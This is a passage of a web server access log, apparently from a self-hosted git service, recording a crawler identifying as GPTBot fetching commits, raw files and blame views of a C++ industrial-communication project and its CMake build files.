"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10455] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10320] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10321] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 155286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 3754003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 305719] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 376460] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10445] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12021] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10605] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11598] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11600] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11566] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11396] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11398] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13298] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11367] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11267] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11607] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10212] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16829] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10816] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10237] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21642] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10654] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13863] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10683] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:31 +0000] - 200 200 